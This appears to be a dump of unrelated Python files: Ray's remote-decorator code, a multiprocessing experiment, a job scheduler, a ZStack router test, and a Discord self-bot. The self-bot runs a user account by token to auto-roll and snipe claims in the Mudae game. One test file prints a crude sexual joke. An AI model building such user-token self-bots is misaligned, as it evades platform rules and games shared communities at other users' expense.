should be rerun when the worker process executing it
crashes unexpectedly. The minimum valid value is 0,
the default is 4 (default), and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
this actor or task and its children. See
:ref:`runtime-environments` for detailed documentation. This API is
in beta and may change before becoming stable.
retry_exceptions (bool): Only for *remote functions*. This specifies
whether application-level errors should be retried
up to max_retries times.
override_environment_variables (Dict[str, str]): (Deprecated in Ray
1.4.0, will be removed in Ray 1.6--please use the ``env_vars``
field of :ref:`runtime-environments` instead.) This specifies
environment variables to override for the actor or task. The
overrides are propagated to all child actors and tasks. This
is a dictionary mapping variable names to their values. Existing
variables can be overridden, new ones can be created, and an
existing variable can be unset by setting it to an empty string.
Note: can only be set via `.options()`.
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
valid_kwargs = [
"num_returns", "num_cpus", "num_gpus", "memory", "object_store_memory",
"resources", "accelerator_type", "max_calls", "max_restarts",
"max_task_retries", "max_retries", "runtime_env", "retry_exceptions"
]
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
f"the arguments in the list {valid_kwargs}, for example "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in valid_kwargs, error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
runtime_env = kwargs.get("runtime_env")
retry_exceptions = kwargs.get("retry_exceptions")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
runtime_env=runtime_env,
worker=worker,
retry_exceptions=retry_exceptions)
|
MultiProcessing.py
|
# Project: hardInfo
# Author: George Keith Watson
# Date Started: March 18, 2022
# Copyright: (c) Copyright 2022 George Keith Watson
# Module: service/MultiProcessing.py
# Date Started: March 22, 2022
# Purpose: Manage initiation and communication between any number of independent processes launched
# in Python.
# Development:
# 2022-03-22: (Experimenting with code examples from: www.tutorialspoint.com/multiprocessing-in-python)
# Each module in this program is an independent tool that can communicate with other tools as needed.
# If another tool is not present in the MultiProcessing registry, its features are simply not
# available in the current tool set. Tools / Python modules, can then be installed, configured,
# and activated and deactivated dynamically, allowing easy upgrade from the free, non-commercial
# version of an application the the commercial, paid-for version.
#
from multiprocessing import Process, JoinableQueue, Queue, cpu_count, Event
from tkinter import Tk, messagebox, BOTH
PROGRAM_TITLE = "MultiProcessing"
class ProcessRegistry:
def __init__(self, applicationName: str, **keyWordArguments):
# keyWordArguments includes:
# 'object': An object of a class with particular methods included:
# messageReceiver( message: dict )
#
pass
def registerProcess(self, processName: str, attributes: str):
pass
def startProcess(self, processName: str, arguments: dict):
pass
def stopProcess(self, processName: str):
pass
def configureProcesss(self, processName: str, confiuration: dict):
pass
def activateProcess(self, processName: str, arguments: dict):
pass
def deactivateProcess(self, processName: str, arguments: dict):
pass
def ExitProgram():
answer = messagebox.askyesno('Exit program ', "Exit the " + PROGRAM_TITLE + " program?")
if answer:
# mainView.destroy()
pass
#************************************* Multiple Windowing Processes Test Code *********************************
from os import environ
from view.PropertySheet import PropertySheet
def messageReceiver(message: dict):
print("MultiProcessing.messageReceiver:\t" + str(message))
def theFullMonty(*args):
print("Four score and seven years ago Marilyn Chambers sat on my face", end=" ")
for arg in args:
print(str(arg), end=' ')
from json import loads
from model.Installation import LSHW_JSON_FILE
from view.Components import JsonTreeView
ENV_PROCESS_TITLE = "Current Environment"
HWD_PROCESS_TITLE = "Current Hardware"
def showEnvironment(geoStr):
def exitProcess():
answer = messagebox.askyesno('Exit Process ', "Exit the " + ENV_PROCESS_TITLE + " process?")
if answer:
processView.destroy()
processView = Tk()
processView.protocol('WM_DELETE_WINDOW', exitProcess)
processView.geometry(geoStr)
processView.title(ENV_PROCESS_TITLE)
info = {}
nameIndex = []
for name, value in environ.items():
# print( name + ":\t" + str(value))
info[name] = value
nameIndex.append(name)
nameIndex.sort()
propertySheet = PropertySheet(processView, "Environment Variables", (info, nameIndex), listener=messageReceiver )
propertySheet.pack(expand=True, fill=BOTH)
processView.mainloop()
def showHardware(geoStr):
def exitProcess():
answer = messagebox.askyesno('Exit Process ', "Exit the " + HWD_PROCESS_TITLE + " process?")
if answer:
processView.destroy()
processView = Tk()
processView.protocol('WM_DELETE_WINDOW', exitProcess)
processView.geometry(geoStr)
processView.title(HWD_PROCESS_TITLE)
lshwJsonFile = open(LSHW_JSON_FILE, "r")
jsonText = lshwJsonFile.read()
lshwJsonFile.close()
propertyMap = loads(jsonText)
jsonTreeView = JsonTreeView(processView, propertyMap, {"openBranches": True, "mode": "strict"})
jsonTreeView.pack(expand=True, fill=BOTH)
processView.mainloop()
#************************************* Communicating Multiple Processes Test Code *********************************
import time
class Tool(Process):
def __init__(self, task_queue, result_queue):
Process.__init__(self)
self.task_queue = task_queue
self.result_queue = result_queue
def run(self):
proc_name = self.name
while True:
next_task = self.task_queue.get()
if next_task is None:
# Poison pill means shutdown
print( '%s: Exiting' % proc_name )
self.task_queue.task_done()
break
print( '%s: %s' % (proc_name, next_task))
answer = next_task()
self.task_queue.task_done()
self.result_queue.put(answer)
return
class Task(object):
def __init__(self, a, b):
self.a = a
self.b = b
def __call__(self, *args, **kwargs):
time.sleep(0.1) # Simulated processing time
return '%s * %s = %s' % (self.a, self.b, self.a * self.b)
def __str__(self):
return '%s * %s' % (self.a, self.b)
#********************************* Signaling Between Processes Test Code *********************************
def wait_for_event(event):
"""wait for the event to be set before doing anything"""
print('wait_for_event: starting')
event.wait()
print('wait_for_event: event.is_set()-> ', event.is_set())
def wait_for_event_timeout(event, sec):
"""wait sec seconds and then timeout"""
print('wait_for_event_timeout: starting')
event.wait(sec)
print('wait_for_event_timeout: event.is_set()-->', event.is_set())
if __name__ == '__main__':
# ********************************* Signaling Between Processes Test Code *************************************
event = Event()
workerOne = Process(name='block', target=wait_for_event, args=(event,))
workerOne.start()
workerTwo = Process(name='non-block', target=wait_for_event_timeout, args=(event, 2))
workerTwo.start()
print('main: waiting before calling Event.set()')
time.sleep(3)
event.set()
print('main: event is set')
# ************************************* Communicating Multiple Processes Test Code *********************************
"""
# Establish communication queues
tasks = JoinableQueue()
results = Queue()
# Start Tools:
num_tools = cpu_count() * 2
print('Creating %d Tools' % num_tools)
tools = [ Tool(tasks, results) for i in range(num_tools) ]
for tool in tools:
tool.start()
# Enqueue jobs
num_jobs = 10
for i in range(num_jobs):
tasks.put(Task(i, i))
# Add a poison pill for each Tool
for i in range(num_tools):
tasks.put(None)
# Wait for all of the tasks to finish
tasks.join()
# Start printing results
while num_jobs:
result = results.get()
print( 'Result:\t', result )
num_jobs -= 1
"""
# ********************************* Multiple Windowing Processes Test Code *********************************
"""
georgeKeenan = Process(target=theFullMonty, args=("and wiggled", "rapidly gyrating", "her hips"))
environmentDialog = Process(target=showEnvironment, args=("600x500+100+50",))
hardwareDialog = Process(target=showHardware, args=("600x500+600+50",))
georgeKeenan.start()
environmentDialog.start()
hardwareDialog.start()
idx = 0
while idx < 10:
print(str(idx), end="\t")
idx += 1
georgeKeenan.join()
environmentDialog.join()
hardwareDialog.join()
"""
"""
mainView = Tk()
mainView.protocol('WM_DELETE_WINDOW', ExitProgram)
mainView.geometry("600x500+100+50")
mainView.title(PROGRAM_TITLE)
mainView.mainloop()
"""
|
scheduler.py
|
#!/usr/bin/env python3
from utility import get_time
import threading
from time import sleep
import sys
def run(work_items, slots):
retries = 0
max_retries = 5000
free_slots = slots
taken_slots = []
work_done = []
total_num_of_jobs = len(work_items)
while(1):
for slot in taken_slots:
if slot.busy == False:
if slot.work.failed == False:
work_done.append(slot.work)
print(get_time(),len(work_done),'out of',total_num_of_jobs,'finished.')
elif retries >= max_retries:
break
else:
retries = retries + 1
print(get_time(),'Retrying work...',retries,'of',max_retries,'retries.')
work_items.append(slot.work)
taken_slots.remove(slot)
free_slots.append(slot)
#have we finished all the work?
if len(work_items) == 0:
if len(taken_slots) == 0:
print(get_time(),'All work finished.')
break
elif retries >= max_retries:
print(get_time(),'Max number of failed retries reached!')
sys.exit(1)
else:
if len(free_slots) != 0:
slot = free_slots.pop()
work = work_items.pop()
slot.work = work
print(get_time(),'Encoding',work.get_name(),'on',slot.machine.host)
work_thread = threading.Thread(target=slot.execute, args=(work,))
work_thread.daemon = True
slot.busy = True
work_thread.start()
taken_slots.append(slot)
sleep(0.2)
return work_done
|
test_start_vrs_simultaneously.py
|
'''
Test stop all vrs, then start them simultaneously
@author: Youyk
'''
import os
import sys
import threading
import time
import zstacklib.utils.linux as linux
import apibinding.inventory as inventory
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.config_operations as con_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstackwoodpecker.operations.net_operations as net_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
_config_ = {
'timeout' : 1000,
'noparallel' : True
}
session_uuid = None
test_stub = test_lib.lib_get_test_stub()
exc_info = []
def start_vm(vm_uuid):
try:
vm_ops.start_vm(vm_uuid, session_uuid, 200000)
except:
exc_info.append(sys.exc_info())
def check_status(callback_data):
vm_uuid, status = callback_data
cond = res_ops.gen_query_conditions('state', '=', status)
cond = res_ops.gen_query_conditions('uuid', '=', vm_uuid, cond)
vms = res_ops.query_resource(res_ops.VM_INSTANCE, cond)
if vms:
return True
return False
def check_exception():
if exc_info:
info1 = exc_info[0][1]
info2 = exc_info[0][2]
raise info1, None, info2
def stop_vm(vm_uuid):
try:
vm_ops.stop_vm(vm_uuid, session_uuid)
except:
exc_info.append(sys.exc_info())
def test():
global session_uuid
session_uuid = acc_ops.login_as_admin()
l3_1_name = os.environ.get('l3VlanNetworkName1')
l3_2_name = os.environ.get('l3VlanDNATNetworkName')
l3_3_name = os.environ.get('l3VlanNetworkName3')
#l3_4_name = os.environ.get('l3VlanNetworkName5')
l3_1 = test_lib.lib_get_l3_by_name(l3_1_name)
l3_2 = test_lib.lib_get_l3_by_name(l3_2_name)
l3_3 = test_lib.lib_get_l3_by_name(l3_3_name)
#l3_4 = test_lib.lib_get_l3_by_name(l3_4_name)
#create 4 VRs.
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_1.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_1_name)
vm.destroy()
vr1 = test_lib.lib_find_vr_by_l3_uuid(l3_1.uuid)[0]
else:
vr1 = vrs[0]
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_2.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_2_name)
vm.destroy()
vr2 = test_lib.lib_find_vr_by_l3_uuid(l3_2.uuid)[0]
else:
vr2 = vrs[0]
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_3.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_3_name)
vm.destroy()
vr3 = test_lib.lib_find_vr_by_l3_uuid(l3_3.uuid)[0]
else:
vr3 = vrs[0]
#vrs = test_lib.lib_find_vr_by_l3_uuid(l3_4.uuid)
#if not vrs:
# vm = test_stub.create_vlan_vm(l3_name=l3_4_name)
# vm.destroy()
# vr4 = test_lib.lib_find_vr_by_l3_uuid(l3_4.uuid)[0]
#else:
# vr4 = vrs[0]
vrs = [vr1, vr2, vr3]
#vrs = [vr1, vr2, vr3, vr4]
for vr in vrs:
thread = threading.Thread(target=stop_vm, args=(vr.uuid,))
thread.start()
while threading.activeCount() > 1:
check_exception()
time.sleep(0.1)
for vr in vrs:
if not linux.wait_callback_success(check_status, (vr.uuid, 'Stopped'), 10):
test_util.test_fail('VM: %s is not stopped, after waiting for extra 10s' % vr.uuid)
check_exception()
for vr in vrs:
thread = threading.Thread(target=start_vm, args=(vr.uuid,))
thread.start()
time.sleep(1)
acc_ops.logout(session_uuid)
while threading.activeCount() > 1:
check_exception()
time.sleep(0.1)
check_exception()
test_util.test_pass('Test start VRs simultaneously success')
def error_cleanup():
global session_uuid
acc_ops.logout(session_uuid)
|
MudaeAutoBot.py
|
import discum
import re
import asyncio
import json
import time
import logging
import threading
from collections import OrderedDict
class CacheDict(OrderedDict):
def __init__(self, *args, **kwds):
self.max = kwds.pop("max", None)
OrderedDict.__init__(self, *args, **kwds)
self._check_size_limit()
def __setitem__(self, key, value):
OrderedDict.__setitem__(self, key, value)
self._check_size_limit()
def _check_size_limit(self):
if self.max is not None:
while len(self) > self.max:
self.popitem(last=False)
msg_buf = CacheDict(max=50)
jsonf = open("Settings_Mudae.json")
settings = json.load(jsonf)
jsonf.close()
bot = discum.Client(token=settings["token"],log={"console":False, "file":False})
mudae = 432610292342587392
with open("cmds.txt","r") as f:
mudae_cmds = [line.rstrip() for line in f]
mhids = [int(mh) for mh in settings["channel_ids"]]
channel_settings = dict()
series_list = settings["series_list"]
chars = [charsv.lower() for charsv in settings["namelist"]]
kak_min = settings["min_kak"]
roll_prefix = settings["roll_this"]
sniping = settings.get("sniping_enabled",True)
ready = bot.gateway.READY
mention_finder = re.compile(r'\<@(?:!)?(\d+)\>')
pagination_finder = re.compile(r'\d+ / \d+')
kak_finder = re.compile(r'\*\*??([0-9]+)\*\*<:kakera:469835869059153940>')
like_finder = re.compile(r'Likes\: \#??([0-9]+)')
claim_finder = re.compile(r'Claims\: \#??([0-9]+)')
poke_finder = re.compile(r'\*\*(?:([0-9+])h )?([0-9]+)\*\* min')
wait_finder = re.compile(r'\*\*(?:([0-9+])h )?([0-9]+)\*\* min \w')
waitk_finder = re.compile(r'\*\*(?:([0-9+])h )?([0-9]+)\*\* min')
ser_finder = re.compile(r'.*.')
KakeraVari = [kakerav.lower() for kakerav in settings["emoji_list"]]
eventlist = ["🕯️","😆"]
kakera_wall = {}
waifu_wall = {}
#logging settings
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s:%(message)s')
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
def get_kak(text):
k_value = kak_finder.findall(text)
like_value = like_finder.findall(text)
claim_value=claim_finder.findall(text)
if len(k_value):
return k_value[0]
elif len(like_value) or len(claim_value):
LR = 0
CR = 0
CA= 1
if(len(like_value)):
LR = like_value[0]
if(len(claim_value)):
CR = claim_value[0]
pkak = (int(LR) + int(CR)) /2
multi = 1 + (CA/5500)
return((25000 *(pkak+70)**-.75+20)*multi+.5)
return 0
def get_wait(text):
waits = wait_finder.findall(text)
if len(waits):
hours = int(waits[0][0]) if waits[0][0] != '' else 0
return (hours*60+int(waits[0][1]))*60
return 0
def get_pwait(text):
waits = poke_finder.findall(text)
if len(waits):
hours = int(waits[0][0]) if waits[0][0] != '' else 0
return (hours*60+int(waits[0][1]))*60
return 0
def get_serial(text):
serk = ser_finder.findall(text)
return serk[0]
_resp = dict()
def wait_for(bot, predicate, timeout=None):
ev = threading.Event()
ident = threading.get_ident()
def evt_check(resp):
if predicate(resp):
_resp[ident] = resp.parsed.auto()
ev.set()
bot.gateway._after_message_hooks.insert(0,evt_check)
ev.wait(timeout)
bot.gateway.removeCommand(evt_check)
obj = _resp.pop(ident,None)
return obj
def mudae_warning(tide,StartwithUser=True):
# build check func
def c(r):
if r.event.message:
r = r.parsed.auto()
# must be from relevant channel id, and start with username
if StartwithUser == True:
return r['author']['id'] == str(mudae) and r['channel_id'] == tide and r['content'].startswith(f"**{bot.gateway.session.user['username']}")
elif StartwithUser == False:
return r['author']['id'] == str(mudae) and r['channel_id'] == tide
return False
return c
def get_server_settings(guild_id,channel_id):
try:
with open(f"channeldata\\{channel_id}.txt","r") as textsettings:
print(f"Reading from File for channel {channel_id}")
return textsettings.read()
except IOError:
print(f"File Not Found using Different Method")
msgs = bot.searchMessages(guild_id,authorID=[mudae],textSearch="($togglehentai)",limit = 5)
Rmsgs = bot.filterSearchResults(msgs)
for group in Rmsgs:
if group['content'].startswith("🛠️"):
print(f"Using $settings found during search for channel {channel_id}")
abcdef = group['content'].replace("🛠️","_").replace("⭐","_")
pres_data = open(f"channeldata\\{channel_id}.txt","w+")
pres_data.write(abcdef)
pres_data.close()
return group['content']
# msgs = bot.searchMessages(guild_id,userID=[mudae],textSearch="($togglehentai)").json()['messages']
# for group in msgs:
# for result in group:
# if 'hit' in result:
# if result['content'].startswith("🛠️"):
# print(result)
# return result['content']
# no setting found
# so send settings request, and hope they have default prefix.
FsMsgs = bot.searchMessages(guild_id,channelID=[channel_id],authorID=[bot.gateway.session.user['id']],textSearch=roll_prefix,limit=2)
FsResults = bot.filterSearchResults(FsMsgs)
for group in FsResults:
if group['content'].endswith(roll_prefix):
settings_hope_prefix = group['content'].split(roll_prefix)[0]
print(f"Default $settings used for channel {channel_id}")
default_settings_if_no_settings = f"""🛠️ __**Server Settings**__ 🛠️
(Server not premium)
· Prefix: **{settings_hope_prefix}** ($prefix)
· Lang: **en** ($lang)
· Claim reset: every **180** min. ($setclaim)
· Exact minute of the reset: xx:**56** ($setinterval)
· Reset shifted: by +**0** min. ($shifthour)
· Rolls per hour: **10** ($setrolls)
· Time before the claim reaction expires: **30** sec. ($settimer)
· Spawn rarity multiplicator for already claimed characters: **2** ($setrare)
· Server game mode: **1** ($gamemode)
· This channel instance: **1** ($channelinstance)
· Slash commands: enabled ($toggleslash)
· Ranking: enabled ($toggleclaimrank/$togglelikerank)
· Ranks displayed during rolls: claims and likes ($togglerolls)
· Hentai series: enabled ($togglehentai)
· Disturbing imagery series: enabled ($toggledisturbing)
· Rolls sniping: **2** ($togglesnipe) => **{settings['claim_delay']}** sec.
· Kakera sniping: **1** ($togglekakerasnipe) => **{settings['kak_delay']}** sec.
· Limit of characters per harem: **8100** ($haremlimit)
· Custom reactions: yes ($claimreact list)
· Kakera trading: **disabled** ($togglekakeratrade)
· Kakera calculation: claims and likes ranks (and number of claimed characters) ($togglekakeraclaim/$togglekakeralike)
· Kakera value displayed during rolls: enabled ($togglekakerarolls)
· $kakeraloot wishprotect: enabled ($togglewishprotect)"""
return default_settings_if_no_settings
def parse_settings_message(message):
if message == None:
return None
val_parse = re.compile(r'\*\*(\S+)\*\*').findall
num_parse = re.compile(r'(\d+)').findall
settings_p = re.findall(r'\w+: (.*)',message)
settings = dict()
settings['prefix'] = val_parse(settings_p[0])[0]
settings['prefix_len'] = len(settings['prefix'])
settings['claim_reset'] = int(num_parse(settings_p[2])[0]) # in minutes
settings['reset_min'] = int(num_parse(settings_p[3])[0])
settings['shift'] = int(num_parse(settings_p[4])[0])
settings['max_rolls'] = int(num_parse(settings_p[5])[0])
settings['expiry'] = float(num_parse(settings_p[6])[0])
settings['claim_snipe'] = [float(v) for v in num_parse(settings_p[15])]
settings['kak_snipe'] = [float(v) for v in num_parse(settings_p[16])]
settings['claim_snipe'][0] = int(settings['claim_snipe'][0])
# pad out claim/kak snipe for default '0 second cooldown'
if len(settings['claim_snipe']) < 2:
settings['claim_snipe'] += [0.0]
if len(settings['kak_snipe']) < 2:
settings['kak_snipe'] += [0.0]
settings['claim_snipe'][0] = int(settings['claim_snipe'][0])
settings['kak_snipe'][0] = int(settings['kak_snipe'][0])
settings['pending'] = None
settings['rolls'] = 0
return settings
def get_snipe_time(channel,rolled,message):
# Returns delay for when you are able to snipe a given roll
r,d = channel_settings[channel]['claim_snipe']
if r == 0:
# Anarchy FTW!
return 0.0
global user
is_roller = (rolled == user['id'])
if (r < 4 or r == 5) and is_roller:
# Roller can insta-snipe
return 0.0
if r == 2 and not is_roller:
# Not the roller.
return d
wished_for = mention_finder.findall(message)
# Wish-based rules
if not len(wished_for):
# Not a WISHED character
if r > 4:
# Combined restriction, roller still gets first dibs
return 0.0 if is_roller else d
return 0.0
if r > 2 and user['id'] in wished_for:
# Wishers can insta-snipe
return 0.0
if r == 1 and rolled not in wished_for:
# Roller (who is not us) did not wish for char, so can insta-snipe
return 0.0
return d
def next_claim(channel):
channel = int(channel)
offset = (120-(channel_settings[channel]['shift']+channel_settings[channel]['reset_min']))*60
reset_period = channel_settings[channel]['claim_reset']*60
t = time.time()+offset
last_reset = (t%86400)%reset_period
reset_at = reset_period-last_reset+time.time()
return (int(t/reset_period),reset_at) # claim window id, timestamp of reset
def next_reset(channel):
# Returns timestamp of next reset
channel = int(channel)
offset = channel_settings[channel]['reset_min']*60
t = time.time()
return t+(3600-((t-offset)%3600))
def poke_roll(tide):
logger.debug(f"Pokemon Rolling Started in channel {tide}. (If you would like this in a different channel, please configure the desired channel ID as the first in your list)")
tides = str(tide)
if tide not in channel_settings:
logger.error(f"Could not find channel {tide}, will not roll poke")
return
c_settings = channel_settings[tide]
pwait = 0
while True:
while pwait == 0:
time.sleep(2)
bot.sendMessage(tides,c_settings['prefix']+"p")
pwait = 2*60*60 # sleep for 2 hours
print(f"{pwait} : pokerolling : {tide}")
time.sleep(pwait)
pwait = 0
def waifu_roll(tide):
global user
logger.debug(f"waifu rolling Started in channel {tide}")
tides = str(tide)
waifuwait = 0
if tide not in channel_settings:
logger.error(f"Could not find channel {tide}, skipping waifu roll on this channel.")
return
c_settings = channel_settings[tide]
roll_cmd = c_settings['prefix'] + roll_prefix
warned_overroll = False
while True:
c_settings['rolls'] = 0
rolls_left = -1
while waifuwait == False:
bot.sendMessage(tides,roll_cmd)
rolls_left = rolls_left-1
varwait = wait_for(bot,mudae_warning(tides,False),timeout=5)
time.sleep(.5)
if varwait != None and varwait['content'].startswith(f"**{bot.gateway.session.user['username']}") and "$ku" not in varwait['content']:
# We over-rolled.
waifuwait = True
if c_settings['rolls'] > 2 and not warned_overroll:
# We overrolled when we shouldn't have. Warn the user they can prevent this
warned_overroll = True
logger.warning("Please enable $rollsleft 0 feature to prevent overrolling")
break
elif varwait != None and rolls_left < 0:
# Check if our roll featured a warning
total_text = varwait.get('content','') # $rollsleft 2
if len(varwait['embeds']):
total_text += varwait['embeds'][0].get('footer',{}).get('text','') # $rollsleft 0 (default)
total_text += varwait['embeds'][0].get('description','') # $rollsleft 1
# Check if it's our roll
our_roll = msg_buf.get(varwait['id'],{}).get('rolled',None)
p = c_settings['pending']
if our_roll == None and p:
# on_message may have not seen our roll, so we should manually check if it was our roll
our_roll = p == bot.gateway.session.user['id']
if our_roll and "\u26a0\ufe0f 2 ROLLS " in total_text:
# Has warning for us
rolls_left = 2
if rolls_left == 0:
# Ran out of rolls
waifuwait = True
print(f"{waifuwait}: Waifu rolling : {tide}")
time.sleep((next_reset(tide)-time.time())+1)
waifuwait = False
def snipe(recv_time,snipe_delay):
if snipe_delay != 0.0:
try:
time.sleep((recv_time+snipe_delay)-time.time())
except ValueError:
# sleep was negative, so we're overdue!
return
time.sleep(.5)
def is_rolled_char(m):
embeds = m.get('embeds',[])
if len(embeds) != 1 or "image" not in embeds[0] or "author" not in embeds[0] or list(embeds[0]["author"].keys()) != ['name']:
# not a marry roll.
return False
elif 'footer' in embeds[0] and 'text' in embeds[0]['footer'] and pagination_finder.findall(embeds[0]['footer']['text']):
# Has pagination e.g. "1 / 29", which does not occur when rolling
return False
return True
@bot.gateway.command
def on_message(resp):
global user
recv = time.time()
if resp.event.message:
m = resp.parsed.auto()
#print(m)
aId = m['author']['id']
content = m['content']
embeds = m['embeds']
messageid = m['id']
channelid = m['channel_id']
guildid = m['guild_id'] if 'guild_id' in m else None
if int(channelid) not in mhids:
# Not a channel we work in.
return
if int(channelid) not in channel_settings:
mhids.remove(int(channelid))
logger.error(f"Could not find settings for {channelid}, please trigger the '$settings' command in the server and run the bot again.")
return
c_settings = channel_settings[int(channelid)]
if c_settings['pending'] == None and int(aId) != mudae and content[0:c_settings['prefix_len']] == c_settings['prefix'] and content.split(' ')[0][c_settings['prefix_len']:] in mudae_cmds:
# Note rolls as they happen so we know who rolled what
c_settings['pending'] = aId
return
elif int(aId) == mudae:
if "interaction" in m:
# Mudae triggered via slash command
roller = m['interaction']['user']['id']
else:
roller = c_settings['pending']
c_settings['pending'] = None
# Validate this is a rolled character.
if not is_rolled_char(m):
# Might be claim timer
if m['content'].startswith('<@' + user['id'] + '>') or m['content'].startswith('<@!' + user['id'] + '>'):
# get claim time
if get_pwait(m['content']):
waifu_wall[channelid] = next_claim(channelid)[0]
return
msg_buf[messageid] = {'claimed':int(embeds[0].get('color',0)) not in (16751916,1360437),'rolled':roller == user['id']}
print(f"Our user rolled in {channelid}" if roller == user['id'] else f"Someone else rolled in {channelid}")
if msg_buf[messageid]['claimed']:
return
if(not sniping and roller != user['id']):
# Sniping disabled by user
return
if roller == user['id']:
# confirmed user roll
c_settings['rolls'] += 1
if waifu_wall.get(channelid,0) != next_claim(channelid)[0]:
snipe_delay = get_snipe_time(int(channelid),roller,content)
charpop = m['embeds'][0]
charname = charpop["author"]["name"]
chardes = charpop["description"]
charcolor = int(charpop['color'])
if str(user['id']) in content:
logger.info(f"Wished {charname} from {get_serial(chardes)} with {get_kak(chardes)} Value in Server id:{guildid}")
snipe(recv,snipe_delay)
if msg_buf[messageid]['claimed']:
return
m_reacts = bot.getMessage(channelid, messageid).json()[0]
if "reactions" in m_reacts:
if m_reacts["reactions"][0]["emoji"]['id'] == None:
bot.addReaction(channelid, messageid, m_reacts["reactions"][0]["emoji"]["name"])
elif m_reacts["reactions"][0]["emoji"]['id'] != None and "kakera" not in m_reacts["reactions"][0]["emoji"]["name"]:
cust_emoji_sen = m_reacts["reactions"][0]["emoji"]["name"] + ":" + m_reacts["reactions"][0]["emoji"]['id']
bot.addReaction(channelid, messageid, cust_emoji_sen)
else:
bot.addReaction(channelid, messageid, "❤")
if charname.lower() in chars:
logger.info(f"{charname} appeared attempting to Snipe Server id:{guildid}")
snipe(recv,snipe_delay)
if msg_buf[messageid]['claimed']:
return
m_reacts = bot.getMessage(channelid, messageid).json()[0]
if "reactions" in m_reacts:
if m_reacts["reactions"][0]["emoji"]['id'] == None:
bot.addReaction(channelid, messageid, m_reacts["reactions"][0]["emoji"]["name"])
elif m_reacts["reactions"][0]["emoji"]['id'] != None and "kakera" not in m_reacts["reactions"][0]["emoji"]["name"]:
cust_emoji_sen = m_reacts["reactions"][0]["emoji"]["name"] + ":" + m_reacts["reactions"][0]["emoji"]['id']
bot.addReaction(channelid, messageid, cust_emoji_sen)
else:
bot.addReaction(channelid, messageid, "❤")
for ser in series_list:
if ser in chardes and charcolor == 16751916:
logger.info(f"{charname} from {ser} appeared attempting to snipe in {guildid}")
snipe(recv,snipe_delay)
if msg_buf[messageid]['claimed']:
return
m_reacts = bot.getMessage(channelid, messageid).json()[0]
if "reactions" in m_reacts:
if m_reacts["reactions"][0]["emoji"]['id'] == None:
bot.addReaction(channelid, messageid, m_reacts["reactions"][0]["emoji"]["name"])
break
elif m_reacts["reactions"][0]["emoji"]['id'] != None and "kakera" not in m_reacts["reactions"][0]["emoji"]["name"]:
cust_emoji_sen = m_reacts["reactions"][0]["emoji"]["name"] + ":" + m_reacts["reactions"][0]["emoji"]['id']
bot.addReaction(channelid, messageid, cust_emoji_sen)
break
else:
bot.addReaction(channelid, messageid, "❤")
break
if "<:kakera:469835869059153940>" in chardes or "Claims:" in chardes or "Likes:" in chardes:
#det_time = time.time()
kak_value = get_kak(chardes)
if int(kak_value) >= kak_min and charcolor == 16751916:
logger.info(f"{charname} with a {kak_value} Kakera Value appeared Server:{guildid}")
snipe(recv,snipe_delay)
if msg_buf[messageid]['claimed']:
return
m_reacts = bot.getMessage(channelid, messageid).json()[0]
if "reactions" in m_reacts:
if m_reacts["reactions"][0]["emoji"]['id'] == None:
bot.addReaction(channelid, messageid, m_reacts["reactions"][0]["emoji"]["name"])
elif m_reacts["reactions"][0]["emoji"]['id'] != None and "kakera" not in m_reacts["reactions"][0]["emoji"]["name"]:
cust_emoji_sen = m_reacts["reactions"][0]["emoji"]["name"] + ":" + m_reacts["reactions"][0]["emoji"]['id']
bot.addReaction(channelid, messageid, cust_emoji_sen)
else:
bot.addReaction(channelid, messageid, "❤")
#print(f"took this much {time.time() - det_time}")
if str(user['id']) not in content and charname.lower() not in chars and get_serial(chardes) not in series_list and int(get_kak(chardes)) < kak_min:
logger.debug(f"Ignoring {charname} from {get_serial(chardes)} with {get_kak(chardes)} Kakera Value in Server id:{guildid}")
if resp.event.message_updated:
# Handle claims
r = resp.parsed.auto()
rchannelid = r["channel_id"]
rmessageid = r["id"]
embeds = r['embeds']
if int(rchannelid) not in mhids:
return
try:
if r['author']['id'] == str(mudae):
if not is_rolled_char(r):
return
embed = embeds[0]
f = embed.get('footer')
if f and bot.gateway.session.user['username'] in f['text']:
# Successful claim, mark waifu claim window as used
waifu_wall[rchannelid] = next_claim(rchannelid)[0]
elif int(embed['color']) == 6753288:
# Someone else has just claimed this, mark as such
msg_buf[rmessageid]['claimed'] = True
except KeyError:
pass
if resp.event.reaction_added:
r = resp.parsed.auto()
